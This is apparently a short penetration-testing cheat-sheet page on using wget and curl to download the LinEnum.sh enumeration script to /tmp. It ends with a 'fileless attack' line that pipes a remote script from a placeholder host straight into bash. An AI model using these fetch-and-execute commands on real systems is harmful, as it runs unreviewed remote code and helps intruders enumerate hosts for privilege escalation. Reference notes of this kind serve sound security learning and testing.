Wget/Curl Download/Upload

Wget:

wget https://url.com/path/LinEnum.sh -O /tmp/LinEnum.sh

Curl:

curl -o /tmp/LinEnum.sh https://url.com/path/LinEnum.sh

Fileless attack cURL and piping with bash

curl https://url.com/path/LinEnum.sh | bash

Last updated